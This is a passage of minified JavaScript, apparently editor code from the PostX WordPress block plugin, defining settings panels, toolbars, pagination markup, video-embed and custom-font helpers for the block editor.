strict";l.d(t,{$U:()=>Re,$i:()=>mt,$m:()=>se,$o:()=>Je,Ar:()=>de,B0:()=>ke,B3:()=>tt,BO:()=>Ae,Bq:()=>Ne,Bv:()=>st,Cz:()=>T,DU:()=>fe,De:()=>it,Df:()=>Y,EG:()=>N,EK:()=>B,Eo:()=>we,G7:()=>G,Gu:()=>gt,HT:()=>k,HU:()=>w,HY:()=>Ye,H_:()=>ze,Hn:()=>Le,I0:()=>H,If:()=>ge,J5:()=>R,JA:()=>W,KE:()=>pe,Ko:()=>dt,Ld:()=>ct,M9:()=>j,MF:()=>p.MF,Mg:()=>Ke,N2:()=>ce,NJ:()=>Ve,Ny:()=>Ee,O2:()=>Oe,Po:()=>D,Qr:()=>pt,RQ:()=>bt,Rd:()=>p.Rd,T:()=>Qe,V2:()=>ee,VH:()=>_e,VI:()=>kt,WD:()=>p.Eo,WJ:()=>p.WJ,Wf:()=>Ce,Wh:()=>me,X_:()=>Me,YA:()=>p.YA,YF:()=>X,YG:()=>x,YZ:()=>Q,Yk:()=>Se,Yp:()=>He,ZJ:()=>Ze,_y:()=>$,aG:()=>ut,ad:()=>A,b0:()=>Ie,cA:()=>ye,cM:()=>O,cr:()=>Pe,dH:()=>ft,dT:()=>p.dT,df:()=>et,do:()=>p.do,e5:()=>U,eC:()=>I,fA:()=>Te,fF:()=>rt,fY:()=>yt,fk:()=>at,fm:()=>De,gA:()=>f,gs:()=>v,hH:()=>F,hd:()=>q,i_:()=>be,ii:()=>Z,iv:()=>$e,jK:()=>V,k0:()=>vt,lA:()=>ve,lj:()=>ot,ng:()=>he,oY:()=>We,oc:()=>Fe,op:()=>L,ov:()=>wt,pI:()=>nt,pj:()=>z,q7:()=>Ue,qM:()=>M,qi:()=>ht,rS:()=>Be,rx:()=>J,sT:()=>lt,sx:()=>p.sx,tf:()=>xe,tj:()=>h,tv:()=>ue,v9:()=>je,wI:()=>Xe,wK:()=>p.wK,wT:()=>Ge,xd:()=>te,yB:()=>qe});var o=l(67294),a=l(13448),i=l(5234),n=l(87763),r=(l(78963),l(83100)),s=l(64766),p=l(87282);const{__}=wp.i18n,{Fragment:c}=wp.element,{addQueryArgs:u}=wp.url,{dateI18n:d}=wp.date,{dispatch:m}=wp.data,{TabPanel:g}=wp.components,y=[],b="https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=quick-query&utm_campaign=postx-dashboard#pricing",v=[],h=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/typography.svg"}),f=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/color.svg"}),k=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/spacing.svg"}),w=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/setting.svg"}),x=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/style.svg"}),T=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/meta-text.svg"});let _=0;wp.data.select("core/edit-site")&&(_=(new Date).getTime(),wp.data.select("core")?.getEntityRecords("postType","wp_template",{per_page:-1}),wp.data.select("core")?.getEntityRecords("postType","wp_template_part",{per_page:-1}));let C=[];(()=>{localStorage.setItem("ultpDevice","lg");const e=u("/ultp/common_data",{wpnonce:ultp_data.security});wp.apiFetch({path:e}).then((e=>{localStorage.setItem("ultpTaxonomy",JSON.stringify(e.taxonomy)),localStorage.setItem("ultpGlobal"+ultp_data.blog,JSON.stringify(e.global));const t=JSON.parse(e.image);Object.keys(t).forEach((function(e){v.push({value:e,label:t[e]})}));const l=JSON.parse(e.posttype);Object.keys(l).forEach((e=>{C.push({value:e,label:l[e]})})),Object.keys(l).forEach((function(e){y.push({value:e,label:l[e]})})),ultp_data.archive&&"archive"==ultp_data.archive&&y.unshift({value:"archiveBuilder",label:"Archive Builder",link:b}),y.unshift({value:"customPostType",label:"Multiple Post Type",link:b,pro:!0}),y.unshift({value:"posts",label:"Specific Posts",link:b}),y.unshift({value:"customPosts",label:"Custom Selections",link:b})}))})();const E=[{type:"select",beside:!0,key:"queryType",label:__("Post Type","ultimate-post"),options:y},{type:"select",key:"queryPostType",pro:!0,multiple:!0,options:C,label:__("Choose Post Types","ultimate-post")},...p.$o],S=(e,t,l)=>{let o=l.slice(0);return t&&(o="__all"===t?[]:o.filter((e=>!t.includes(e.key)))),e&&e.forEach((e=>{if("string"==typeof e){const t=l.find((t=>t.key===e));t&&o.push(t)}else e.data&&(o[e.position]?o[e.position].key==e.data.key&&"separator"!==e.data.type||o.splice(e.position,0,e.data):o.push(e.data))})),o},P=(e,t)=>{const{data:l,opType:o}=e;if("keep"===o){const e=[];return t.forEach((t=>{(l.includes(t.key)||"separator"===t.type)&&e.push(t)})),e}return"discard"===o?t.filter((e=>!l.includes(e.key)||"separator"===e.type)):[...t]},L=[...p.ly],I=["taxonomy","maxTaxonomy","catPosition"],B=["catStyle","catTypo","customCatColor","onlyCatColor","cTab","catLineWidth","seperatorLink","catLineSpacing","catRadius","catSacing","catPadding"],U=[...p.Sk],M=["readMoreText","readMoreIcon"],A=["readMoreTypo","readMoreIconSize","rmTab","readMoreSacing","readMorePadding"],H=["arrowSize","arrowWidth","arrowHeight","arrowVartical"],N=["dotSpace","dotVartical","dotHorizontal"],j=[{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignleft"}),title:__("Left","ultimate-post"),value:"left"},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-aligncenter"}),title:__("Center","ultimate-post"),value:"center"},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignright"}),title:__("Right","ultimate-post"),value:"right"}],Z=[...p.Kq],O=["headingText","headingAlign","headingTag","headingStyle","headingBtnText","headingURL","subHeadingShow","subHeadingText"],R=["headingTypo","headingColor","headingBg","headingBg2","headingBorderBottomColor","headingBorderBottomColor2","headingBorder","headingBtnColor","headingBtnHoverColor","headingSpacing","headingPadding","headingRadius","subHeadingTypo","subHeadingColor","subHeadingSpacing","enableWidth","customWidth"],D=[{type:"select",key:"imgCrop",label:__("Image Size","ultimate-post"),options:v},{type:"select",key:"imgCropSmall",label:__("Small Image Size","ultimate-post"),options:v},...p.MS],z=["imgCrop","imgCropSmall","imgAnimation","imgOverlay","imgOverlayType","overlayColor","imgOpacity","imgSrcset","imgLazy"],F=["imgWidth","imgHeight","imageScale","imgTab","imgMargin"],W=["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"],V=[...p.Oi],G=["metaPosition","metaList","metaListSmall","authorLink","metaDateFormat","cMetaRepetableField","metaAuthorPrefix","metaMinText"],q=["metaStyle","metaSeparator","metaTypo","metaColor","metaHoverColor","metaSeparatorColor","metaBg","metaSpacing","metaBorder","metaMargin","metaPadding"],$=[],K=[...p.kr],J=[...p.Sv],Y=["filterBelowTitle","filterType","filterValue","filterText","filterMobile","filterMobileText"],X=["fliterTypo","fTab","filterRadius","filterDropdownColor","filterDropdownHoverColor","filterDropdownBg","filterDropdownRadius","fliterSpacing","fliterPadding"],Q=[...p.tp],ee=["paginationType","loadMoreText","paginationText","pagiAlign","paginationNav","paginationAjax","navPosition"],te=["pagiTypo","pagiArrowSize","pagiTab","pagiMargin","navMargin","pagiPadding"],le=[{type:"textarea",key:"advanceCss",placeholder:__("Add {{ULTP}} before the selector to wrap element.","ultimate-post")}],oe=[{type:"toggle",key:"hideExtraLarge",label:__("Hide On Extra Large Display","ultimate-post"),pro:!0},{type:"toggle",key:"hideTablet",label:__("Hide On Tablet","ultimate-post"),pro:!0},{type:"toggle",key:"hideMobile",label:__("Hide On Mobile","ultimate-post"),pro:!0}];let ae=[{value:"regular",label:__("Regular (All Taxonomy)","ultimate-post")},{value:"child",label:__("Child Of","ultimate-post")},{value:"parent",label:__("Parent (Only Parent Taxonomy)","ultimate-post")},{value:"custom",label:__("Custom","ultimate-post")}];const ie=[{value:"immediate_child",label:__("Immediate Child (Archive)","ultimate-post")},{value:"current_level",label:__("Current Level (Archive)","ultimate-post")},{value:"allchild",label:__("All Child (Archive)","ultimate-post")}];ae="archive"==ultp_data?.archive?ae.concat(ie):ae;const ne=[{type:"select",key:"taxType",label:__("Query Type","ultimate-post"),options:ae},{type:"select",key:"taxSlug",label:__("Taxonomy Type","ultimate-post"),multiple:!1},{type:"select",key:"taxValue",label:__("Taxonomy Value","ultimate-post"),multiple:!0},{type:"range",key:"queryNumber",min:0,max:200,help:__("Set 0 for get all taxonomy.","ultimate-post"),label:__("Number of Post","ultimate-post")}],re=[...p.Xl],se=[...p.jQ],pe=["advFilterEnable","advPaginationEnable"],ce=["headingShow","filterShow","paginationShow"];function ue(e){return[{isToolbar:!0,data:{type:"tab_toolbar",content:e}}]}const de=e=>(0,o.createElement)(i.Z,{initialOpen:e.initialOpen||!1,title:"inline"==e.title?"":__("Layout","ultimate-post"),block:e.block,store:e.store,col:e.col,data:[e.data]}),me=e=>{const t=S(e.include,e.exclude,Z);let l=null;return e.isTab&&(l={settings:O,style:R}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Heading","ultimate-post"),store:e.store,data:t,hrIdx:e.hrIdx})},ge=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("General","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.Vv)}),ye=e=>(0,o.createElement)(i.Z,{doc:e.doc,dynamicHelpText:e.dynamicHelpText,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("General","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.f$)});function be(e){return ue([{name:"spacing",title:__("Grid Spacing","ultimate-post"),options:S(e.include,e.exclude,p.yX)}])}const ve=e=>(0,o.createElement)(i.Z,{doc:e.doc,dynamicHelpText:e.dynamicHelpText,youtube:"https://wpxpo.com/docs/postx/postx-features/advanced-query-builder/?utm_source=db-postx-editor&utm_medium=video-docs&utm_campaign=postx-dashboard",initialOpen:e.initialOpen||!1,title:"inline"==e.title?"":__("Query Builder","ultimate-post"),store:e.store,data:S(e.include,e.exclude,E)}),he=e=>{const t=S(e.include,"archive"==ultp_data.archive?["paginationAjax"].concat(e.exclude||[]):e.exclude,Q);let l=null;return e.isTab&&(l={settings:ee,style:te}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:"https://wpxpo.com/docs/postx/postx-features/pagination/?utm_source=db-postx-editor&utm_medium=video-docs&utm_campaign=postx-dashboard",initialOpen:e.initialOpen||!1,title:__("Pagination","ultimate-post"),store:e.store,pro:e.pro,data:t,hrIdx:e.hrIdx})};function fe(e){return ue([{name:"pagi",title:e.title,options:S(e.include,e.exclude,Q)}])}const ke=e=>{const t=S(e.include,e.exclude,J);let l=null;return e.isTab&&(l={settings:Y,style:X}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:"https://wpxpo.com/docs/postx/postx-features/postx-ajax-filtering/?db-postx-editor&utm_medium=video-docs&utm_campaign=postx-dashboard",initialOpen:e.initialOpen||!1,title:__("Filter","ultimate-post"),store:e.store,pro:e.pro,data:t,hrIdx:e.hrIdx})};function we(e){return ue([{name:"filter",title:e.title,options:S(e.include,e.exclude,J)}])}const xe=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Arrow","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.D3)});function Te(e){return ue([{name:"arrow",title:e.title||__("Arrow Style","ultimate-post"),options:S(e.include,e.exclude,p.D3)}])}const _e=e=>{const t=S(e.include,e.exclude,p.pf);let l=null;if(e.isTab){const e=["titleTag","titlePosition","titleLength","titleStyle"];l={settings:e,style:P({opType:"discard",data:e},t).map((e=>e.key))}}return(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Title","ultimate-post"),store:e.store,data:t,hrIdx:e.hrIdx})};function Ce(e){return ue([{name:"title",title:e.title||__("Title Style","ultimate-post"),options:S(e.include,e.exclude,p.pf)}])}const Ee=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Prefix","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.MQ),hrIdx:e.hrIdx}),Se=e=>{const t=S(e.include,e.exclude,V);let l=null;return e.isTab&&(l={settings:G,style:q}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,tabs:[{name:"settings",title:"Settings",icon:n.Z.settings3},{name:"style",title:"Style",icon:n.Z.style}],doc:e.doc,depend:e.depend,youtube:"https://wpxpo.com/docs/postx/postx-features/post-meta/?db-postx-editor&utm_medium=video-docs&utm_campaign=postx-dashboard",initialOpen:e.initialOpen||!1,title:__("Meta","ultimate-post"),store:e.store,pro:e.pro,data:t,hrIdx:e.hrIdx})};function Pe(e){return ue([{name:"meta",title:e.title,options:S(e.include,e.exclude,V)}])}const Le=e=>{const t=S(e.include,e.exclude,D);let l=null;if(e.isTab){const e=["imgCrop","imgCropSmall","imgAnimation","imgOverlay","imgOverlayType","overlayColor","imgOpacity","imgSrcset","imgLazy","fallbackEnable","fallbackImg"];l={settings:e,style:P({opType:"discard",data:e},t).map((e=>e.key))}}return(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Image","ultimate-post"),store:e.store,data:t,hrIdx:e.hrIdx})};function Ie({store:e,settingsKeys:t,styleKeys:l,oArgs:i,settingsTitle:n,styleTitle:r,incSettings:s=[],exSettings:p=[],incStyle:u=[],exStyle:d=[]}){const m=P({opType:"keep",data:t},i),g=P({opType:"keep",data:l},i),y=S(s,p,m),b=S(u,d,g);return(0,o.createElement)(c,null,(0,o.createElement)(a.Z,{buttonContent:x,include:ue([{name:"tab_style",title:r,options:b}]),store:e,label:r}),(0,o.createElement)(a.Z,{buttonContent:w,include:ue([{name:"tab_settings",title:n,options:y}]),store:e,label:n}))}const Be=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Video","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.ag),hrIdx:e.hrIdx});function Ue(e){return ue([{name:"video",title:e.title||__("Video Settings","ultimate-post"),options:S(e.include,e.exclude,p.ag)}])}const Me=e=>{const t=S(e.include,e.exclude,K);let l=null;return e.isTab&&(l={settings:["showSmallExcerpt","showSeoMeta","showFullExcerpt","excerptLimit"],style:["excerptTypo","excerptColor","excerptPadding"]}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,tabs:[{name:"settings",title:"Settings",icon:n.Z.settings3},{name:"style",title:"Style",icon:n.Z.style}],doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:e.title||__("Excerpt","ultimate-post"),store:e.store,data:t,hrIdx:e.hrIdx})};function Ae(e){return ue([{name:"excerpt",title:e.title,options:S(e?.include,e?.exclude,K)}])}const He=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Separator","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.iw)}),Ne=e=>{const t=S(e.include,e.exclude,L);let l=null;return e.isTab&&(l={settings:I,style:B}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Taxonomy / Category","ultimate-post"),store:e.store,pro:e.pro,data:t,hrIdx:e.hrIdx})};function je(e){return ue([{name:"cat",title:e.title,options:S(e?.include,e?.exclude,L)}])}const Ze=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Button Style","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.Sg)}),Oe=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Content","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.J$)}),Re=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Entry Header","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.RP)}),De=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Content","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.ff)}),ze=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Dot","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.si)});function Fe(e){return ue([{name:"dot",title:e.title,options:S(e?.include,e?.exclude,p.si)}])}const We=e=>{const t=S(e.include,e.exclude,U);let l=null;return e.isTab&&(l={settings:M,style:A}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Read More","ultimate-post"),store:e.store,data:t,hrIdx:e.hrIdx})};function Ve(e){return ue([{name:"read-more",title:e.title,options:S(e?.include,e?.exclude,U)}])}const Ge=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Count Style","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.U8)}),qe=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("General","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.Zv)}),$e=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Custom CSS","ultimate-post"),store:e.store,data:S(e.include,e.exclude,le)}),Ke=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Responsive","ultimate-post"),store:e.store,pro:e.pro,data:S(e.include,e.exclude,oe)}),Je=e=>(0,o.createElement)(i.Z,{initialOpen:e.initialOpen||!1,store:e.store,title:"inline"==e.title?"":__("Taxonomy Query","ultimate-post"),data:S(e.include,e.exclude,ne)}),Ye=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Wrap Style","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.qS)}),Xe=e=>{const t=(e.data||re).map((t=>{let l=!1;if(e.dep&&e.dep.includes(t.key))return{...t,label:(0,o.createElement)(c,null,t.label,(0,o.createElement)("span",{className:"ultp-label-tag-dep",title:"This feature is deprecated may be removed in the future updates. Please use the better alternatives."},"Deprecated"))};let a=(0,o.createElement)(c,null);return!ultp_data.active&&e.pro&&e.pro.includes(t.key)&&(!0,a=(0,o.createElement)("span",{className:"ultp-label-tag-pro",title:"Pro Feature"},(0,o.createElement)("a",{href:(0,r.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},"Pro"))),e.new&&e.new.includes(t.key)&&(a=(0,o.createElement)(c,null,a,(0,o.createElement)("span",{className:"ultp-label-tag-new",title:"Newly Added Feature"},"New"))),{...t,label:(0,o.createElement)(c,null,t.label,a)}}));return(0,o.createElement)(g,{className:"ultp-toolbar-tab",tabs:[{name:"features",title:e.label}]},(l=>(0,o.createElement)(i.Z,{isToolbar:!0,initialOpen:!1,title:"inline",store:e.store,data:S(e.include,e.exclude,t)})))},Qe=e=>(0,o.createElement)(i.Z,{doc:e.doc,pro:e.pro,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:e.title||__("Common","ultimate-post"),store:e.store,data:S(e.include,e.exclude,[])}),et=e=>(0,o.createElement)(i.Z,{title:"inline",isToolbar:!0,store:e.store,data:S(e.include,e.exclude,[])}),tt=e=>(0,o.createElement)(i.Z,{isToolbar:!0,doc:e.doc,depend:e.depend,youtube:e.youtube,title:"inline",store:e.store,data:S(e.include,e.exclude,[])});function lt(e){return(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,store:e.store,data:[{type:"typography_toolbar",key:e.attrKey,label:e.label}]})}function ot(e){return(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,store:e.store,data:[{type:"toolbar_dropdown",label:e.label,options:e.options,key:e.attrKey}]})}const at=(e={})=>Object.assign({},{arrows:!0,dots:!0,infinite:!0,speed:500,slidesToShow:!0,slidesToScroll:1,autoplay:!0,autoplaySpeed:3e3,cssEase:"linear",lazyLoad:!0},e),it=e=>"default_date"==e?ultp_data.date_format:"default_date_time"==e?ultp_data.date_format+" "+ultp_data.time_format:e,nt=()=>(0,o.createElement)("div",{className:"ultp-next-prev-wrap ultp-disable-editor-click"},(0,o.createElement)("ul",null,(0,o.createElement)("li",null,(0,o.createElement)("a",{className:"ultp-prev-action ultp-disable",href:"#"},s.ZP.leftAngle2,(0,o.createElement)("span",{className:"screen-reader-text"},__("Previous","ultimate-post")))),(0,o.createElement)("li",null,(0,o.createElement)("a",{className:"ultp-prev-action",href:"#"},s.ZP.rightAngle2,(0,o.createElement)("span",{className:"screen-reader-text"},__("Next","ultimate-post")))))),rt=(e,t,l="",a=4)=>{const i=l.split("|"),n=i[0]||__("Previous","ultimate-post"),r=i[1]||__("Next","ultimate-post");return(0,o.createElement)("div",{className:"ultp-pagination-wrap ultp-disable-editor-click"+(t?" ultp-pagination-ajax-action":"")},(0,o.createElement)("ul",{className:"ultp-pagination"},(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#",className:"ultp-prev-page-numbers"},s.ZP.leftAngle2,"textArrow"==e?" "+n:"")),a>4&&(0,o.createElement)("li",{className:"ultp-first-dot"},(0,o.createElement)("a",{href:"#"},"...")),new Array(a>2?3:a).fill(0).map(((e,t)=>(0,o.createElement)("li",{key:t},(0,o.createElement)("a",{href:"#"},t+1)))),a>4&&(0,o.createElement)("li",{className:"ultp-last-dot"},(0,o.createElement)("a",{href:"#"},"...")),a>5&&(0,o.createElement)("li",{className:"ultp-last-pages"},(0,o.createElement)("a",{href:"#"},a)),(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#",className:"ultp-next-page-numbers"},"textArrow"==e?r+" ":"",s.ZP.rightAngle2))))},st=e=>(0,o.createElement)("div",{className:"ultp-loadmore"},(0,o.createElement)("a",{className:"ultp-loadmore-action ultp-disable-editor-click"},e)),pt=(e,t)=>{let l=!1;const o=["filterShow","filterType","filterValue","queryUnique","queryNumPosts","queryNumber","metaKey","queryType","queryTax","queryTaxValue","queryRelation","queryOrderBy","queryOrder","queryExclude","queryOffset","queryQuick","taxType","taxSlug","taxValue","queryAuthor","queryCustomPosts","queryPosts","queryExcludeTerm","queryExcludeAuthor","querySticky","taxonomy","fallbackImg","maxTaxonomy","queryPostType"];for(let a=0;a<o.length;a++)if(e[o[a]]!=t[o[a]]){l=!0;break}return l},ct=e=>{const{filterShow:t,filterType:l,filterValue:o,queryNumPosts:a,queryNumber:i,queryType:n,queryTax:r,queryTaxValue:s,queryOrderBy:p,queryOrder:c,queryInclude:u,queryExclude:d,queryOffset:m,metaKey:g,queryQuick:y,queryAuthor:b,queryRelation:v,querySticky:h,queryPosts:f,queryCustomPosts:k,queryExcludeTerm:w,queryExcludeAuthor:x,queryUnique:T,taxonomy:_,fallbackImg:C,maxTaxonomy:E,queryPostType:S}=e;let P=i;if(void 0!==a&&void 0!==i){const e=wp.data.select("core/editor")?.getDeviceType?.()||wp.data.select(wp.data.select("core/edit-site")?"core/edit-site":"core/edit-post")?.__experimentalGetPreviewDeviceType(),t=null!=e?e:"Desktop";JSON.stringify({lg:parseInt(a.lg||""),sm:parseInt(a.sm||""),xs:parseInt(a.xs||"")})!=JSON.stringify({lg:parseInt(i),sm:parseInt(i),xs:parseInt(i)})&&("Desktop"==t?P=a.lg:"Tablet"==t?P=a.sm||a.lg:"Mobile"==t&&(P=a.xs||a.lg))}return{filterShow:t,filterType:l,filterValue:o,queryNumber:P,queryType:n,queryTax:r,queryTaxValue:s,queryOrderBy:p,queryOrder:c,queryInclude:u,queryExclude:d,queryOffset:m,metaKey:g,queryQuick:y,queryAuthor:b,queryRelation:v,querySticky:h,queryPosts:f,queryCustomPosts:k,queryExcludeTerm:w,queryExcludeAuthor:x,queryUnique:T,taxonomy:_,fallbackImg:C,maxTaxonomy:E,queryPostType:S,wpnonce:ultp_data.security}},ut=[{position:1,data:{type:"select",key:"titleAnimation",label:__("Content Animation","ultimate-post"),options:[{value:"",label:"- None -"},{value:"slideup",label:__("Slide Up","ultimate-post"),pro:!0},{value:"slidedown",label:__("Slide Down","ultimate-post"),pro:!0}]}}],dt=(e,t)=>{const l="style2"==t?"ol":"ul";if(e)return(e="string"==typeof e?JSON.parse(e):e).length>0&&(0,o.createElement)(l,{className:"ultp-toc-lists"},e.map(((e,l)=>(0,o.createElement)("li",{key:l},(0,o.createElement)("a",{href:`#${e.link}`},e.content),e.child&&dt(e.child,t)))))},mt=(e="",t=!0,l=0,a=0,i="")=>{if(e){let n="";if(e.includes("youtu")){const o=/youtu(?:.*\/v\/|.*v\=|\.be\/)([A-Za-z0-9_\-]{11})/gm.exec(e);o&&o[1]&&(n="//www.youtube.com/embed/"+o[1]+"?playlist="+o[1]+"&iv_load_policy=3&controls=0&autoplay=1&disablekb=1&rel=0&enablejsapi=1&showinfo=0&wmode=transparent&widgetid=1&playsinline=1&mute=1",n+="&loop="+(t?1:0),n+=l?"&start="+l:"",n+=a?"&end="+a:"")}else{if(!e.includes("vimeo"))return(0,o.createElement)("div",{className:"ultp-rowbg-video"},(0,o.createElement)("video",{className:"ultp-bgvideo",poster:i&&i,muted:!0,loop:!0,autoPlay:!0},(0,o.createElement)("source",{src:e})));{const l=e.match(/(?:www\.|player\.)?vimeo.com\/(?:channels\/(?:\w+\/)?|groups\/(?:[^\/]*)\/videos\/|album\/(?:\d+)\/video\/|video\/|)(\d+)(?:[a-zA-Z0-9_\-]+)?/i);l[1]&&(n="//player.vimeo.com/video/"+l[1]+"?autoplay=1&title=0&byline=0&portrait=0&transparent=0&background=1",n+="&loop="+(t?1:0))}}return n?(0,o.createElement)("div",{className:"ultp-rowbg-video"},(0,o.createElement)("iframe",{src:n,frameBorder:"0",allowFullScreen:!0})):i?(0,o.createElement)("img",{src:i,alt:"Video Fallback Image"}):""}return i?(0,o.createElement)("img",{src:i,alt:"Video Fallback Image"}):""},gt=e=>{const t=wp.data.select("core/block-editor").getBlocks(e);t.length>0&&t.forEach(((e,t)=>{m("core/block-editor").updateBlockAttributes(e.clientId,{updateChild:!e.attributes.updateChild})}))},yt=()=>{const e=window.document.getElementsByName("editor-canvas");return e[0]?.contentDocument?e[0]?.contentDocument:window.document},bt=(e="",t=!1)=>{if("true"!=ultp_data.settings?.ultp_custom_font)return[];const l=ultp_data.custom_fonts,o=[];let a="";return l?.forEach((t=>{const l=[];t.font.forEach((o=>{const i=[];l.push(o.weight),e.includes(t.title)&&(o.woff&&i.push(`url(${o.woff}) format('woff')`),o.woff2&&i.push(`url(${o.woff2}) format('woff2')`),o.ttf&&i.push(`url(${o.ttf}) format('TrueType')`),o.svg&&i.push(`url(${o.svg}) format('svg')`),o.eot&&i.push(`url(${o.eot}) format('eot')`),a+=` @font-face {\n                    font-family: "${t.title}";\n                    font-weight: ${o.weight};\n                    font-display: auto;\n                    src: ${i.join(", ")};\n                } `)})),o.push({n:t.title,v:l,f:""})})),t?a+e:o||[]},vt=()=>{const e=window.location.href;return void 0!==e&&-1!==e.indexOf("path=%2Fpatterns")&&e.indexOf("site-editor.php")>-1},ht=(e,t,l,o)=>{const a=(t,o)=>{t&&t!=l&&("wp_block"===o||e({currentPostId:t?.toString()}))},i=wp.data.select("core/editor")?.getCurrentPostId(),n=wp.data.select("core/edit-site"),r=n?.getEditedPostType()||"";if(t?.hasOwnProperty("ref"))a(t.ref,"wp_block");else if(document.querySelector(".widgets-php"))a("ultp-widget","widget");else if("wp_template_part"==r||"wp_template"==r){const e=(new Date).getTime();setTimeout((()=>{const e=wp.data.select("core")?.getEntityRecords("postType","wp_template",{per_page:-1})||[],t=wp.data.select("core")?.getEntityRecords("postType","wp_template_part",{per_page:-1})||[],l=(()=>{let e={};const t=yt()?.querySelectorAll("*[data-type='core/template-part']");return t?.forEach((t=>{const l=t.querySelectorAll(".wp-block"),o=t.dataset.block,a=[];l?.forEach((e=>{e?.dataset?.type?.includes("ultimate-post/")&&e?.dataset?.block&&a.push(e.dataset.block)})),a.length&&(e={...e,hasItems:"yes",[o]:a})})),e})();let s="";if(l.hasItems&&(s=Object.keys(l).find((e=>l[e]?.includes(o)))),s){const e=wp.data.select("core/block-editor").getBlockAttributes(s),l=t.find((t=>t.id.includes("//"+e?.slug)));a(l?.wp_id,"fse-part")}else if("string"==typeof i&&i.includes("//")){const l=n?.getEditedPostId(),o=("wp_template"==r?e:t).find((e=>e.id==l));a(o?.wp_id,"wp_template"==r?"fse-template":"fse-part")}else a(i,"__editorPostId_fse")}),_&&(e-_)/1e3>=4?0:1500)}else i&&a(i,"__editorPostId")},ft=()=>ultp_data.active?(0,o.createElement)("div",{className:"ultp-editor-support"},(0,o.createElement)("div",{className:"ultp-editor-support-content"},(0,o.createElement)("img",{alt:"site 